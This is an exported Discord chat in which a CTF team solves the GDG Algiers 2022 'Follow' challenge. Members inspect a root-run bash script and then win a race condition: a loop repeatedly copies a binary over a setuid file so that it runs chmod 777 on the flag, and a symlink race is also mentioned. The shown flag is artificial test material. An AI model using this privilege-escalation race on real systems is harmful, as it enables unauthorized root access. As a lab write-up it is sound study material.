Guild icon
Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-misc-follow
Avatar
Sutx BOT 10/08/2022 11:00 AM
Follow - 500 points
Category: Misc Description: > I'm new to linux and wanted to learn some bash.
This is what I have made so far.
Password : ctf Author : ouxs Files: No files. Tags: linux
10/08/2022 11:00 AM
Sutx pinned a message to this channel. 10/08/2022 11:00 AM
Avatar
Sutx BOT 10/08/2022 11:02 AM
@crazyman ai wants to collaborate 🤝
Avatar
sahuang 10/08/2022 11:49 AM
ctf@564f8adf2fc2:/$ sudo cat flag.txt We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for ctf:
11:49
ctf@564f8adf2fc2:/challenge$ cat script.sh #!/bin/bash set -euxo pipefail CTF_DIR="/home/ctf" CHALLENGE_DIR="/challenge" PROG="testing-sudo" CTF_USER="ctf" CTF_CRACKED_USER="ctf-cracked" SUM="116c9f232ee81305478c093ad774d72c" check () { file="${1}" if [ -e "${CTF_DIR}/${file}" ] && ! [ -f "${CTF_DIR}/${file}" ]; then rm -rf "${CTF_DIR}/${file}" fi if ! [ -e "${CTF_DIR}/${file}" ]; then touch "${CTF_DIR}/${file}" fi if ! [ "$SUM" == $( md5sum "${CTF_DIR}/${file}" | awk '{print $1}') ]; then cp "${CHALLENGE_DIR}/${file}" "${CTF_DIR}/${file}" fi chown "${CTF_CRACKED_USER}:${CTF_CRACKED_USER}" "${CTF_DIR}/${file}" chmod 4644 "${CTF_DIR}/${file}" } reset(){ file="${1}" chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}" chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}/${file}" chmod 744 "${CTF_DIR}/${file}" } chown "root:root" "${CTF_DIR}" chmod 755 "${CTF_DIR}" check "$PROG" chmod +x "${CTF_DIR}/${PROG}" sudo -u "${CTF_CRACKED_USER}" "${CTF_DIR}/${PROG}" reset "$PROG"
11:49
ctf@564f8adf2fc2:/challenge$ cat testing-sudo.c #include <stdio.h> #include <unistd.h> int main(int argc, char const *argv[]) { if ((getuid()==1000) && (geteuid() == 1000)){ printf("Executing a program with cracked user\n"); }else{ printf("Executing a program with ctf user\n"); } return 0; }
Avatar
Sutx BOT 10/08/2022 1:13 PM
@irogir wants to collaborate 🤝
Avatar
sahuang 10/08/2022 3:08 PM
oh wait @irogir so it's not related to the reset race condition you mentioned?
Avatar
Sutx BOT 10/08/2022 3:09 PM
@22sh wants to collaborate 🤝
Avatar
irogir 10/08/2022 3:09 PM
nope that was complete nonsense, there is a race condition but not exploitable (edited)
Avatar
crazyman ai 10/08/2022 4:54 PM
have no idea of it
16:54
Possibly a race condition?
Avatar
sahuang 10/08/2022 7:16 PM
@irogir i got confirmed its race condition tho
Avatar
Sutx BOT 10/08/2022 8:11 PM
@Violin wants to collaborate 🤝
Avatar
Sutx BOT 10/08/2022 8:57 PM
@Zafirr wants to collaborate 🤝
Avatar
Avatar
sahuang
@irogir i got confirmed its race condition tho
sahuang 10/08/2022 9:13 PM
race condition on script.sh
Avatar
Sutx BOT 10/08/2022 9:15 PM
@Guesslemonger wants to collaborate 🤝
Avatar
Avatar
sahuang
race condition on script.sh
Zafirr 10/08/2022 9:15 PM
but we cant even run script.sh...
Avatar
sahuang 10/08/2022 9:16 PM
you can run script.sh as root
Avatar
Zafirr 10/08/2022 9:17 PM
oh
Avatar
sahuang 10/08/2022 9:19 PM
try sudo -l
21:21
check what you can run as another user
Avatar
sahuang 10/08/2022 9:28 PM
ctf@4258882da3d5:~$ sudo -l Matching Defaults entries for ctf on 4258882da3d5: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User ctf may run the following commands on 4258882da3d5: (root : root) NOPASSWD: /challenge/script.sh
21:28
run it without password for root user
21:29
ctf@4258882da3d5:~$ sudo /challenge/script.sh + CTF_DIR=/home/ctf + CHALLENGE_DIR=/challenge + PROG=testing-sudo + CTF_USER=ctf + CTF_CRACKED_USER=ctf-cracked + SUM=116c9f232ee81305478c093ad774d72c + chown root:root /home/ctf + chmod 755 /home/ctf + check testing-sudo + file=testing-sudo + '[' -e /home/ctf/testing-sudo ']' + '[' -f /home/ctf/testing-sudo ']' + '[' -e /home/ctf/testing-sudo ']' ++ md5sum /home/ctf/testing-sudo ++ awk '{print $1}' + '[' 116c9f232ee81305478c093ad774d72c == 53a9dab16370bfd0a5ae4be949e9b444 ']' + cp /challenge/testing-sudo /home/ctf/testing-sudo + chown ctf-cracked:ctf-cracked /home/ctf/testing-sudo + chmod 4644 /home/ctf/testing-sudo + chmod +x /home/ctf/testing-sudo + sudo -u ctf-cracked /home/ctf/testing-sudo Executing a program with cracked user + reset testing-sudo + file=testing-sudo + chown ctf:ctf /home/ctf + chown ctf:ctf /home/ctf/testing-sudo + chmod 744 /home/ctf/testing-sudo
Avatar
Zafirr 10/08/2022 9:29 PM
yeah
Avatar
sahuang 10/08/2022 9:32 PM
gives some weird stuff after running this ctf@4258882da3d5:~$ ./a Executing a program with ctf user ctf@4258882da3d5:~$ ls a repeat.sh testing-sudo ctf@4258882da3d5:~$ ./repeat.sh ctf@4258882da3d5:~$ cat repeat.sh #!/bin/bash while true; do cp a testing-sudo; done
Avatar
Zafirr 10/08/2022 9:33 PM
lmao thats me
21:33
im trying stuff
Avatar
sahuang 10/08/2022 9:33 PM
lmfao
21:33
ok
Avatar
Zafirr 10/08/2022 9:35 PM
CyberErudites{Th4t__SYYYM_JU$T_RU11n3d_MA_D44aaY}
Avatar
Avatar
Zafirr
used /ctf solve
Sutx BOT 10/08/2022 9:35 PM
✅ Challenge solved.
Avatar
sahuang 10/08/2022 9:37 PM
wtf
21:37
how
Avatar
crazyman ai 10/08/2022 9:37 PM
wtf? how?
Avatar
sahuang 10/08/2022 9:37 PM
how did u trigger the race?
Avatar
Zafirr 10/08/2022 9:37 PM
i created a.sh that ran chmod 777 on flag.txt
21:37
and ran repeat.sh to cp it to testing-sudo (edited)
Avatar
sahuang 10/08/2022 9:38 PM
wowo
Avatar
Avatar
Zafirr
and ran repeat.sh to cp it to testing-sudo (edited)
irogir 10/09/2022 3:29 AM
gg, but isnt chown "root:root" "${CTF_DIR}" preventing you from doing that?
03:29
nvm, its not recursive like it was in the other challenges
03:31
i guess one could also symlink the file to flag.txt and abuse the race condition between chown "${CTF_USER}:${CTF_USER}" "${CTF_DIR}/${file}" chmod 744 "${CTF_DIR}/${file}" to read the flag
Avatar
Zafirr 10/09/2022 3:41 AM
i think thats the intended way based on the flag
Avatar
22sh 10/09/2022 3:41 AM
Yeah « follow »
Exported 45 message(s)